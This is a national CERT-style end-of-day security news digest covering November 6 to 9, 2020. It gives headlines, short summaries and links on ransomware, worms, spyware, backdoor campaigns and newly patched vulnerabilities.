End-of-Day report
Timeframe: Freitag 06-11-2020 18:00 - Montag 09-11-2020 18:00
Handler: Thomas Pribitzer
Co-Handler: Stephan Richter
News
Hacker haben mehrfach Sourcecode aus SonarQube-Instanzen abgegriffen
Das FBI warnte bereits im Oktober vor einem Angriff auf Installationen unter anderem von US-Regierungsbehörden, aber auch privater Firmen.
https://heise.de/-4951630
Lets Encrypt: Alte Android-Geräte bekommen Probleme mit Millionen Seiten
Der Zertifikatswechsel bei Lets Encrypt sorgt für Probleme bei einem Drittel aller Android-Geräte. Die Lösung dafür ist der Firefox.
https://www.golem.de/news/let-s-encrypt-alte-android-geraete-bekommen-probleme-mit-millionen-seiten-2011-151987-rss.html
New Pay2Key ransomware encrypts networks within one hour
A new ransomware called Pay2Key has been targeting organizations from Israel and Brazil, encrypting their networks within an hour in targeted attacks still under investigation.
https://www.bleepingcomputer.com/news/security/new-pay2key-ransomware-encrypts-networks-within-one-hour/
How Ryuk Ransomware operators made $34 million from one victim
One hacker group that is targeting high-revenue companies with Ryuk ransomware received $34 million from one victim in exchange for the decryption key that unlocked their computers.
https://www.bleepingcomputer.com/news/security/how-ryuk-ransomware-operators-made-34-million-from-one-victim/
Gitpaste-12 Worm Targets Linux Servers, IoT Devices
The newly discovered malware uses GitHub and Pastebin to house component code, and harbors 12 different initial attack vectors.
https://threatpost.com/gitpaste-12-worm-linux-servers-iot-devices/161016/
Adventures in Anti-Gravity
Here we deconstruct a Mac variant of GravityRAT (the cross-platform spyware, known to target the Indian armed forces).
https://objective-see.com/blog/blog_0x5B.html
Cryptojacking Targeting WebLogic TCP/7001, (Sat, Nov 7th)
This past week got some interesting logs targeting TCP/7001 (WebLogic CVE-2020-14882 - see previous diary[1][2]) looking to download and launch a shell script to install various cryptominer on the target. The shell script target SELINUX compatible hosts likely CentOS/RedHat, Ubuntu, etc to install various cryptominer applications.
https://isc.sans.edu/diary/rss/26768
How Attackers Brush Up Their Malicious Scripts, (Mon, Nov 9th)
On Friday, I received a bunch of alerts from one of my YARA hunting rules. Several samples were submitted from the same account (through the VT API), from the same country (US), and in a very short period of time. All the submitted files were OLE2 files containing a malicious macro. All of them had a low VT score so it deserved some investigations. I downloaded the samples and had a look at them.
https://isc.sans.edu/diary/rss/26770
When Threat Actors Fly Under the Radar: Vatet, PyXie and Defray777
Vatet, PyXie and Defray777 are all associated with a financially motivated threat group. We aim to get these malware families on the radar.
https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/
xHunt Campaign: Newly Discovered Backdoors Using Deleted Email Drafts and DNS Tunneling for Command and Control
We observed evidence that the xHunt campaign used two backdoors on a compromised Microsoft Exchange Server at an organization in Kuwait.
https://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/
Vulnerabilities
Cisco stopft schwerwiegende Lücke in Webex Meetings für Windows
Die Schwachstelle kommt bei internen Tests ans Licht. Ein lokaler Angreifer kann Schadcode ausführen. Weitere Schwachstellen stecken im Web Network Recording Player und Webex Player.
https://www.zdnet.de/88389577/cisco-stopft-schwerwiegende-luecke-in-webex-meetings-fuer-windows/
WordPress Sites Open to Code Injection Attacks via Welcart e-Commerce Bug
The shopping cart application contains a PHP object-injection bug.
https://threatpost.com/wordpress_open_to_attacks_welcart_bug/161037/
Security updates for Monday
Security updates have been issued by CentOS (bind, firefox, java-1.8.0-openjdk, kernel, libX11, qemu-kvm, thunderbird, and xorg-x11-server), Debian (guacamole-server, krb5, libexif, poppler, raptor2, and sympa), Fedora (blueman, chromium, freetype, galera, krb5, libtpms, mariadb, mariadb-connector-c, pngcheck, and salt), Mageia (blueman, docker, fontforge, junit, libproxy, libuv, mariadb, suricata, and webmin), openSUSE (apache-commons-httpclient, bluez, gnome-settings-daemon, gnome-shell, [...]
https://lwn.net/Articles/836676/